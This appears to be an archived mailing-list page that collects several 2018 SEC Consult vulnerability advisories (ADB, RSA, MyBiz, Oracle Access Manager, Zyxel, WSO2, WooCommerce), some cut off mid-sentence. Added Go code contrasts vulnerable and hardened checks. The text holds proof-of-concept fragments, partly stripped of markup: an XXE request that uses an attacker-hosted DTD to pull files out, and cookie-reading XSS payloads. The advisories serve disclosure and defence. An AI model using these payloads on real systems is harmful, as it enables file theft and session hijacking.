box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the local root vulnerability on affected and unpatched devices
an attacker is able to gain full access to the device with highest privileges.
Attackers are able to modify any settings that might have otherwise been
prohibited by the ISP. It is possible to retrieve all stored user credentials
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network
side of the ISP are possible by using the device as a jump host, depending on
the internal network security measures.

Network security should not depend on the security of independent devices,
such as modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports in order for customers to use them for
printer or file sharing. In the past, ADB devices have suffered from symlink
attacks e.g. via FTP server functionality which has been fixed in more recent
firmware versions.

The "Network File Sharing" feature of current ADB devices via USB uses a samba
daemon which accesses the USB drive with highest access rights and exports the
network shares with root user permissions. The default and hardcoded setting
for the samba daemon within the smb.conf on the device has set "wide links =
no" which normally disallows gaining access to the root file system of the
device using symlink attacks via a USB drive.

But an attacker is able to exploit both a web GUI input validation problem and
a samba configuration file parsing problem, which together make it possible to
access the root file system of the device with root access rights via a
manipulated USB drive.

The attacker can then edit various system files, e.g. passwd and session
information of the web server in order to escalate web GUI privileges and
start a telnet server and gain full system level shell access as root.


This is a local attack and not possible via remote access vectors as an
attacker needs to insert a specially crafted USB drive into the device!
Usually not even the ISPs themselves have direct root access on ADB devices
hence this attack is quite p

SEC Consult SA-20180516-0 :: XXE & XSS vulnerabilities in RSA Authentication Manager

2018-05-16 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
===
  title: XXE & XSS vulnerabilities
product: RSA Authentication Manager
 vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
  fixed version: 8.3 P1 and later
 CVE number: CVE-2018-1247
 impact: High
   homepage: https://www.rsa.com
  found: 2017-11-16
 by: Mantas Juskauskas (Office Vilnius)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about


Business recommendation:

By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication manager can be affected by exploiting client-side
issues.

SEC Consult recommends applying the available patches from the vendor.


Vulnerability overview/description:
---
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The used XML parser is resolving XML external entities which allows an
authenticated attacker (or an attacker that is able to trick an authenticated
user into importing malicious XML files) to read files, send requests to
systems on the internal network (e.g. port scanning) or cause a DoS (e.g.
billion laughs attack).
This issue has been fixed by RSA as described in the advisory DSA-2018-086.
(http://seclists.org/fulldisclosure/2018/May/18)


2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.

The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.


3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.

The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.

Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.


Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-1247)

The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.

For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected
endpoint:
==
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: :7004
Cookie: [snip]

[snip]

-9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"
Content-Type: text/xml


/a.dtd">



-9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"

[snip]

==

In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:
==
# cat /var/www/a.dtd

:8080/%p1;'>">
%p2;
==

Assuming that the RSA Authentication Manager OS has network level access to
the TCP port 80 and 8080 of th

Re: SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet

2018-05-15 Thread SEC Consult Vulnerability Lab
The following CVE numbers have been assigned now:
XSS issue: CVE-2018-11090
Arbitrary File Upload: CVE-2018-11091


On 2018-05-14 13:25, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
> ===
>   title: Arbitrary File Upload & Cross-site scripting
> product: MyBiz MyProcureNet
>  vulnerable version: 5.0.0
>   fixed version: unknown
>  CVE number: -
>  impact: Critical
>homepage: http://www.mybiz.net/
>   found: 2018-01-29
>  by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
>  Fikri Fadzil (Office Singapore)
>  Wan Ikram (Office Kuala Lumpur)
>  Jasveer Singh (Office Kuala Lumpur)
>  SEC Consult Vulnerability Lab
> 
>  An integrated part of SEC Consult
>  Europe | Asia | North America
> 
>  https://www.sec-consult.com
> 
> ===
> 
> Vendor description:
> ---
> "MyBiz is a company fixated on developing technology which transforms the way
> business is done online. At the intersection of what one business needs from
> another is the potential for value to be created differently. This
> intersection for the exchange of value requires technology but in
> fundamentally very different ways from traditional enterprise systems. MyBiz
> believes that the chemistry of business is the business relationships between
> enterprises. The strength of the business relationship drives the success and
> future of the business. MyBiz believes that these business relationships need
> to be captured and orchestrated. MyBiz developed our proprietary Business
> Relationship Network engine, a platform to capture business relationships as
> data to drive new business services which create value efficiently."
> 
> Source: http://www.mybiz.net/copy-of-our-story
> 
> 
> Business recommendation:
> 
> The vendor did not reply to our inquiries since February 2018 hence the issues
> might still exist in current versions.
> 
> SEC Consult recommends not to use this product until a thorough security review
> has been performed by security professionals and all identified issues have
> been resolved. It is assumed that MyBiz products are affected by further
> critical security issues.
> 
> 
> Vulnerability overview/description:
> ---
> The identified vulnerabilities can be exploited after authentication but
> the registration for the application is usually open for anyone.
> 
> 1. Arbitrary File Upload
> A malicious file can be uploaded to the webserver by an attacker. It is
> possible for an attacker to upload a script to issue operating system
> commands.
> 
> This vulnerability occurs because an attacker is able to adjust the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
> extensions to the whitelist during the upload.
> 
> For instance, if the extension .asp is added to the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
> accepts "secctest.asp" as legitimate file. Hence malicious files can be
> uploaded in order to execute arbitrary commands to take over the server.
> 
> 
> 2. Reflected Cross-site scripting
> This vulnerability within "ProxyPage.aspx" allows an attacker to inject
> malicious client side scripting which will be executed in the browser of
> users if they visit the manipulated site.
> 
> 
> Proof of concept:
> -
> The proof of concept has been removed as no patch is available.
> 
> 
> Vulnerable / tested versions:
> -
> MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. This
> was the latest version available at the time of the test.
> 
> 
> Vendor contact timeline:
> 
> 2018-02-22: Contacting vendor through i...@mybiz.net (no response)
> 2018-02-27: Request update from vendor (no response)
> 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
>         (no response)
> 2018-05-14: Public release of security advisory
> 
> 
> Solution:
> -----
> None
> 
> 
> Workaround:
> ---
> None
> 
> 
> Advisory URL:
> -
> https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
> 
> ~~~~~~~~~~~~~~~~~~~~

SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet

2018-05-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
===
  title: Arbitrary File Upload & Cross-site scripting
product: MyBiz MyProcureNet
 vulnerable version: 5.0.0
  fixed version: unknown
 CVE number: -
 impact: Critical
   homepage: http://www.mybiz.net/
  found: 2018-01-29
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
 Fikri Fadzil (Office Singapore)
 Wan Ikram (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"MyBiz is a company fixated on developing technology which transforms the way
business is done online. At the intersection of what one business needs from
another is the potential for value to be created differently. This
intersection for the exchange of value requires technology but in
fundamentally very different ways from traditional enterprise systems. MyBiz
believes that the chemistry of business is the business relationships between
enterprises. The strength of the business relationship drives the success and
future of the business. MyBiz believes that these business relationships need
to be captured and orchestrated. MyBiz developed our proprietary Business
Relationship Network engine, a platform to capture business relationships as
data to drive new business services which create value efficiently."

Source: http://www.mybiz.net/copy-of-our-story


Business recommendation:

The vendor did not reply to our inquiries since February 2018 hence the issues
might still exist in current versions.

SEC Consult recommends not to use this product until a thorough security review
has been performed by security professionals and all identified issues have
been resolved. It is assumed that MyBiz products are affected by further
critical security issues.


Vulnerability overview/description:
---
The identified vulnerabilities can be exploited after authentication but
the registration for the application is usually open for anyone.

1. Arbitrary File Upload
A malicious file can be uploaded to the webserver by an attacker. It is
possible for an attacker to upload a script to issue operating system
commands.

This vulnerability occurs because an attacker is able to adjust the
"HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
extensions to the whitelist during the upload.

For instance, if the extension .asp is added to the
"HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
accepts "secctest.asp" as legitimate file. Hence malicious files can be
uploaded in order to execute arbitrary commands to take over the server.
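As an added illustration (not MyBiz code and not part of the advisory), the following Go program models the pattern described above: a hidden form field named "HiddenFieldControlCustomWhiteListedExtensions" extends the server's extension allowlist, so the client can make "secctest.asp" acceptable for its own upload, beside a hardened check that consults only the server-side list. The allowlist contents, the file field name "theFile" and the request construction are assumptions made for this example.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"mime/multipart"
	"net/http"
	"net/http/httptest"
	"path/filepath"
	"strings"
)

var ErrExtension = errors.New("file extension not permitted")

// Server-side policy: the only place an upload allowlist may live (assumed contents).
var uploadAllowlist = map[string]bool{".pdf": true, ".png": true, ".jpg": true}

// hasAllowedExt normalises the name (base name, last suffix, lower-case) and
// looks the extension up in the given set.
func hasAllowedExt(name string, allowed map[string]bool) bool {
	return allowed[strings.ToLower(filepath.Ext(filepath.Base(name)))]
}

// vulnerableCheck models the advisory's bug: the request's own
// "HiddenFieldControlCustomWhiteListedExtensions" field extends the policy,
// so a client can allow any extension it likes for its own upload.
func vulnerableCheck(r *http.Request, name string) error {
	allowed := make(map[string]bool, len(uploadAllowlist))
	for ext := range uploadAllowlist {
		allowed[ext] = true
	}
	for _, ext := range strings.Split(r.FormValue("HiddenFieldControlCustomWhiteListedExtensions"), ",") {
		if ext = strings.TrimSpace(strings.ToLower(ext)); ext != "" {
			allowed["."+strings.TrimPrefix(ext, ".")] = true
		}
	}
	if !hasAllowedExt(name, allowed) {
		return ErrExtension
	}
	return nil
}

// hardenedCheck consults only the server-side allowlist; any policy field
// carried in the request is ignored.
func hardenedCheck(name string) error {
	if !hasAllowedExt(name, uploadAllowlist) {
		return ErrExtension
	}
	return nil
}

// decide parses the multipart upload and returns both verdicts for the
// submitted filename so the two designs can be compared side by side.
func decide(r *http.Request) (vulnErr, hardErr error) {
	_, hdr, err := r.FormFile("theFile")
	if err != nil {
		return err, err
	}
	return vulnerableCheck(r, hdr.Filename), hardenedCheck(hdr.Filename)
}

// uploadRequest builds a constructed multipart request: the file plus,
// optionally, the client-supplied extension field named in the advisory.
func uploadRequest(filename, customExts string) *http.Request {
	var body bytes.Buffer
	w := multipart.NewWriter(&body)
	if customExts != "" {
		w.WriteField("HiddenFieldControlCustomWhiteListedExtensions", customExts)
	}
	fw, _ := w.CreateFormFile("theFile", filename)
	fw.Write([]byte("constructed file content"))
	w.Close()
	r := httptest.NewRequest(http.MethodPost, "/upload", &body)
	r.Header.Set("Content-Type", w.FormDataContentType())
	return r
}

func main() {
	v, h := decide(uploadRequest("secctest.asp", "asp")) // the advisory's example
	fmt.Printf("secctest.asp with client whitelist: vulnerable=%v hardened=%v\n", v, h)
	v, h = decide(uploadRequest("Report.PDF", ""))
	fmt.Printf("Report.PDF: vulnerable=%v hardened=%v\n", v, h)
}
```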


2. Reflected Cross-site scripting
This vulnerability within "ProxyPage.aspx" allows an attacker to inject
malicious client side scripting which will be executed in the browser of
users if they visit the manipulated site.


Proof of concept:
-
The proof of concept has been removed as no patch is available.


Vulnerable / tested versions:
-
MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. This
was the latest version available at the time of the test.


Vendor contact timeline:

2018-02-22: Contacting vendor through i...@mybiz.net (no response)
2018-02-27: Request update from vendor (no response)
2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
(no response)
2018-05-14: Public release of security advisory


Solution:
-
None


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC C

SEC Consult SA-20180503-0 :: Authentication Bypass in Oracle Access Manager (OAM)

2018-05-03 Thread SEC Consult Vulnerability Lab
We have published an accompanying blog post to this technical advisory with
further information:

Blog:
https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/

Demo video: https://www.youtube.com/watch?v=YK7_1NozAwQ



SEC Consult Vulnerability Lab Security Advisory < 20180503-0 >
===
  title: Authentication Bypass
product: Oracle Access Manager
 vulnerable version: 11.1.2.3.0, 12.2.1.3.0
  fixed version: April 2018 CPU
 CVE number: CVE-2018-2879
 impact: Critical
   homepage: https://www.oracle.com/
  found: 2017-11
 by: W. Ettlinger (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Oracle Access Management provides innovative new services that complement
traditional access management capabilities. It not only provides Web SSO with
MFA, coarse grained authorization and session management but also provides
standard SAML Federation and OAuth capabilities to enable secure access to
external cloud and mobile applications. It can be easily integrated with the
Oracle Identity Cloud Service to support hybrid access management capabilities
that can help customers to seamlessly protect on-premise and cloud applications
and workloads."

URL: http://www.oracle.com/technetwork/middleware/id-mgmt/index-090417.html


Business recommendation:

SEC Consult did not conduct a full security audit as only a cryptographic
implementation was analyzed. However, since the vulnerability was found in such
a central component of the OAM, we suspect that an insufficient amount of
attention has been given to information security.

Given the central position in an organization's security infrastructure, we
recommend Oracle's customers to either conduct a full audit of the component
or to request the results of such audits from Oracle.

The security patches from the Oracle CPU April 2018 have to be applied
immediately!


Vulnerability overview/description:
---
Due to an improper usage of the CBC encryption mode, Oracle Access Manager (OAM)
is vulnerable to an authentication bypass vulnerability. An attacker can abuse
this vulnerability to log in to any resource protected by the OAM using any user
account, even administrative accounts! This security vulnerability completely
breaks the main functionality of the OAM product.

An attacker can create a scenario in which the OAM replies differently depending
on whether the PKCS#7 padding of an encrypted message is valid or invalid. This
behavior can be used to mount a padding oracle attack. An attacker can decrypt
and encrypt several messages used to communicate between the OAM and web
servers. The attack described here allows an attacker to create arbitrary
authentication cookies which are accepted by the OAM.


Proof of concept:
-
A successful user authentication with Oracle Access Manager (OAM) involves the
following steps:

1. The user accesses a protected resource.
2. A component in the web server (the Oracle Webgate) answers this request with
   a redirect to the OAM. An encrypted message ("encquery") is passed to the OAM
   in a URL parameter.
3. The user authenticates against the OAM (e.g. with username and password).
4. The OAM redirects the user back to the web server. Information about the
   successful login is passed in the parameter "encreply".
5. The web server redirects the user to the resource that was initially
   requested. An encrypted authentication token is stored in a cookie
   (OAMAuthnCookie).
6. The authentication token in the OAMAuthnCookie cookie is used from now on
   to authenticate the user.

All three encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted
with a CBC cipher using the same key. This key is shared between the OAM and the
web server.

The attack exploits step 2 of the authentication process: the attacker sends
manipulated "encquery" parameters and observes the server's response.

The following shows an example of a decrypted encquery:
salt=sF/vMVV0Gkr/k+IhbrXYWg== wh=agentid wu=%2F wo=1 rh=http://server: 
ru=%2F
reqtime=151000 ctx= validate=

where
* the "salt" is a randomly generated value
* "validate" is a hash over certain parts of the message (MD5)
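As an added illustration (not Oracle's code and not part of the advisory), the Go program below models why an integrity hash such as "validate", carried inside the encrypted message, cannot prevent the padding oracle described in the overview: the padding has to be checked before that hash can be read, so a tampered message is answered with a distinguishable padding error. Beside it sits an encrypt-then-MAC design that authenticates IV and ciphertext before decryption and maps every failure to one error. AES-CBC with PKCS#7 padding, the HMAC-SHA256 tag and the keys, IV and message are constructed assumptions; the advisory does not give the OAM cipher parameters.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha256"
	"errors"
	"fmt"
)

// A server whose answer differs between ErrBadPadding and any other failure is
// a padding oracle. The hardened path below only ever returns ErrAuth.
var (
	ErrBadPadding = errors.New("invalid PKCS#7 padding")
	ErrAuth       = errors.New("decryption failed")
)
func pkcs7Pad(b []byte, bs int) []byte {
	n := bs - len(b)%bs
	return append(b[:len(b):len(b)], bytes.Repeat([]byte{byte(n)}, n)...) // copies, never aliases b
}
func pkcs7Unpad(b []byte, bs int) ([]byte, error) {
	n := len(b)
	if n == 0 || n%bs != 0 || b[n-1] == 0 || int(b[n-1]) > bs {
		return nil, ErrBadPadding
	}
	pad := int(b[n-1])
	if !bytes.Equal(b[n-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, ErrBadPadding
	}
	return b[:n-pad], nil
}
func cbc(key, iv, in []byte, encrypt bool) []byte { // in must be whole blocks
	blk, _ := aes.NewCipher(key)
	mode := cipher.NewCBCDecrypter(blk, iv)
	if encrypt {
		mode = cipher.NewCBCEncrypter(blk, iv)
	}
	out := make([]byte, len(in))
	mode.CryptBlocks(out, in)
	return out
}
func hmacTag(key []byte, parts ...[]byte) []byte {
	m := hmac.New(sha256.New, key)
	for _, p := range parts {
		m.Write(p)
	}
	return m.Sum(nil)
}

// Vulnerable design: CBC with no integrity check on the ciphertext. A hash kept
// inside the plaintext (like the advisory's "validate" field) cannot help: it is
// only readable after the padding check, which has already answered the probe.
func sealUnauthenticated(key, iv, msg []byte) []byte {
	return cbc(key, iv, pkcs7Pad(msg, aes.BlockSize), true)
}
func openUnauthenticated(key, iv, ct []byte) ([]byte, error) {
	if len(ct)%aes.BlockSize != 0 {
		return nil, ErrBadPadding
	}
	return pkcs7Unpad(cbc(key, iv, ct, false), aes.BlockSize) // leaks padding validity
}

// Hardened design (encrypt-then-MAC): a separate key authenticates IV and
// ciphertext, verified in constant time before any decryption, so tampered
// input never reaches the padding check and every failure is the same ErrAuth.
func sealAuthenticated(encKey, macKey, iv, msg []byte) (ct, tag []byte) {
	ct = cbc(encKey, iv, pkcs7Pad(msg, aes.BlockSize), true)
	return ct, hmacTag(macKey, iv, ct)
}
func openAuthenticated(encKey, macKey, iv, ct, tag []byte) ([]byte, error) {
	if len(ct)%aes.BlockSize != 0 || !hmac.Equal(hmacTag(macKey, iv, ct), tag) {
		return nil, ErrAuth
	}
	pt, err := pkcs7Unpad(cbc(encKey, iv, ct, false), aes.BlockSize)
	if err != nil {
		return nil, ErrAuth
	}
	return pt, nil
}

// tamperPenultimateBlock flips the top bit of the last byte of the second-to-
// last ciphertext block. CBC XORs that byte into the last plaintext byte, so a
// valid pad value (1..16) becomes >= 0x80 and the padding is invalid every time.
func tamperPenultimateBlock(ct []byte) []byte {
	out := append([]byte{}, ct...)
	out[len(out)-aes.BlockSize-1] ^= 0x80
	return out
}

func main() {
	key, macKey := []byte("0123456789abcdef0123456789abcdef"), []byte("fedcba9876543210fedcba9876543210") // constructed
	iv, msg := []byte("constructed-iv!!"), []byte("wh=agentid wu=/ ru=/")
	_, err1 := openUnauthenticated(key, iv, tamperPenultimateBlock(sealUnauthenticated(key, iv, msg)))
	ct, tag := sealAuthenticated(key, macKey, iv, msg)
	_, err2 := openAuthenticated(key, macKey, iv, tamperPenultimateBlock(ct), tag)
	fmt.Println("tampered, unauthenticated CBC:", err1, "| tampered, encrypt-then-MAC:", err2)
}
```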

To conduct a padding oracle attack, an attacker would modify the second last
encrypted block of an encrypted message. Most of the time, this causes the
padding in the decrypted message to be invalid. In case the padding is accepted,
the attacker gains information about the p

SEC Consult SA-20180424-0 :: Reflected Cross-Site Scripting in multiple Zyxel ZyWALL products

2018-04-24 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180424-0 >
===
  title: Reflected Cross-Site Scripting
product: Zyxel ZyWALL: see "Vulnerable / tested version"
 vulnerable version: ZLD 4.30 and before
  fixed version: ZLD 4.31
 CVE number: -
 impact: Medium
   homepage: https://www.zyxel.com
  found: 2018-02-05
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.

We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml


Business recommendation:

SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.


Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (XSS)
A reflected cross-site scripting vulnerability was identified in
'free_time_failed.cgi' in the admin interface. The parameter 'err_msg' is
returned without any sanitization of the input. An attacker, for example,
can exploit this vulnerability to steal cookies from the attacked user in
order to hijack a session and gain access to the device.


Proof of concept:
-
1) Reflected Cross-Site Scripting (XSS)
By opening the following link, contents of the 'arip' and 'zy_pc_browser'
cookies will be displayed.

http:///free_time_failed.cgi?err_msg=alert(document.cookie);
https:///free_time_failed.cgi?err_msg=alert(document.cookie);


Vulnerable / tested versions:
-
The following versions are affected:
Zyxel ZyWall USG 110       ZLD 4.30 and earlier
Zyxel ZyWall USG 210       ZLD 4.30 and earlier
Zyxel ZyWall USG 310       ZLD 4.30 and earlier
Zyxel ZyWall USG 1100      ZLD 4.30 and earlier
Zyxel ZyWall USG 1900      ZLD 4.30 and earlier
Zyxel ZyWall USG 2200-VPN  ZLD 4.30 and earlier


Vendor contact timeline:

2018-02-07: Contacting vendor through secur...@zyxel.com.tw
2018-02-08: Vendor responded with contact information and a PGP key.
Sent the encrypted advisory to the contact.
2018-02-09: Contact confirmed that the advisory was received.
2018-02-16: Contact confirmed the vulnerability and stated that the ZyWALL series
is vulnerable to the reported vulnerability. The contact also stated
that the vulnerability will be fixed until the end of March.
Requested more information regarding version numbers and other
affected devices.
2018-02-23: Contact confirmed that the devices are vulnerable in firmware version
4.30 and before.
2018-03-21: Contact informed us that the new firmware version will be ZLD 4.31
and that it will be released on 2018-04-17. Shifted release of
advisory to 2018-04-17.
2018-04-12: Informed the contact that the advisory will be released in a few days.
2018-04-17: Asked the vendor if ZLD 4.31 was released. Didn't find the new version
on the customer portal. E-mail was blocked and returned.
2018-04-18: Found the new version (ZLD 4.31) on the customer portal.
2018-04-24: Advisory release.


Solution:
-
Install firmware version ZLD 4.31 from the vendor's website to fix this issue:

https://www.zyxel.com/support/download_landing.shtml


Workaround:
---
Restrict network access to the device.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~


SEC Consult SA-20180423-0 :: Multiple Stored XSS Vulnerabilities in WSO2 Carbon and Dashboard Server

2018-04-24 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
===
  title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
 vulnerable version: WSO2 Identity Server 5.3.0
  fixed version: WSO2 Identity Server 5.5.0
 CVE number: CVE-2018-8716
 impact: high
   homepage: https://wso2.com/products/dashboard
  found: 2017-12-13
 by: W. Schober (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"WSO2 Carbon redefines middleware by providing an integrated and componentized
middleware platform that adapts to the specific needs of any enterprise
IT project - on premise or in the cloud.
100% open source and standards-based, WSO2 Carbon enables developers to rapidly
orchestrate business processes, compose applications and develop services using
WSO2 Developer Studio and a broad range of business and technical services that
integrate with legacy, packaged and SaaS applications.
The lean, complete, OSGi-based platform includes more than 175 components – OSGi
bundles or Carbon features. The WSO2 Carbon core framework functions as
“Eclipse for servers” and includes common capabilities shared by all WSO2
products, such as built-in registry, user management, transports, security,
logging, clustering, caching and throttling services, co-ordination, and a
GUI framework."

Source: https://wso2.com/products/carbon/

"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
rapidly create visually appealing and engaging web components such as
dashboards, and gadgets, and unlocking data for business intelligence and
monitoring. With the host of capabilities that Dashboard Server provides
out-of-the-box, going from data to screen has never been easier."

Source: https://wso2.com/products/dashboard-server/


Business recommendation:

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change passwords,
alter their profiles, or change certain settings. An attacker is able to inject
arbitrary JavaScript payloads into various textboxes (username, home address,
lastname, firstname, etc).

The payloads are permanently stored in the dashboard and triggered every time the
dashboard is visited. The payload is also potentially triggered in the carbon
part of WSO2, which means that an attacker would be able to inject payloads
from the front-end application into a middleware application, which is not
accessible from the internet and attack administrators.

2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
host URL an arbitrary JavaScript payload can be injected and permanently stored
in the web application.


Proof of concept:
-
1) Stored Cross-Site Scripting in WSO2 Dashboard
The following input fields are vulnerable and JavaScript payloads can be directly
injected:
- Firstname
- Lastname
- Username
- Address

It is suspected that all user inputs are returned unfiltered in all server
responses.

2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set
the URL to the following payload: ">

Every time the carbon middleware application is accessed, the payload is
triggered.


Vulnerable / tested versions:
-
The following version has been tested which was the most recent version
at the time of discovery:

* WSO2IS 5.3.0


Vendor contact timeline:

2018-01-25: Contacting vendor through secur...@wso2.com
2018-02-08: Asking for status update. Vendor responds, that they are
still investigating the issue.
2018-02-21: Vendor responds with release date and further details
concerning the nature of the vulnerabilities. The XSS in the
Carbon component was a duplicate and should be already fixed.
Concerning the XSS in the dashboard a fix is implemented
and will be rolled out with the release of WSO2 Identity
Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us, that the final release of the updated
software will be o

SEC Consult SA-20180314-0 :: Arbitrary Shortcode Execution & Local File Inclusion in WooCommerce Products Filter (PluginUs.Net)

2018-03-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180314-0 >
===
  title: Arbitrary Shortcode Execution & Local File Inclusion
product: WOOF - WooCommerce Products Filter (PluginUs.Net)
 vulnerable version: 1.1.9
  fixed version: 2.2.0
 CVE number: (requested but not yet received)
 impact: Critical
   homepage: https://pluginus.net/
  found: 2018-02-20
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"PluginUs.Net is a little team of talented professionals from Ukraine. Unlike
most of the big companies on the net, we believe in individual approach to
every our customer. Web development is our passion and we always try to go an
extra mile over our clients' expectations.

Our team specializes in development of WordPress plugins. It's always exciting
to try new technologies and approaches to get the project done and impress
clients by realization of their ideas!"

Source: https://pluginus.net/about-us/


Business recommendation:

SEC Consult recommends to upgrade to the latest version available
as soon as possible. Further detailed security tests should be performed
in order to identify potential other security issues.


Vulnerability overview/description:
---
1. Arbitrary Shortcode Execution
The plugin implements a page redraw AJAX function that is accessible to anyone
without any authentication.

WordPress shortcode markup passed in the "shortcode" parameter is evaluated.
Normally unauthenticated users can't evaluate shortcodes, as they are often
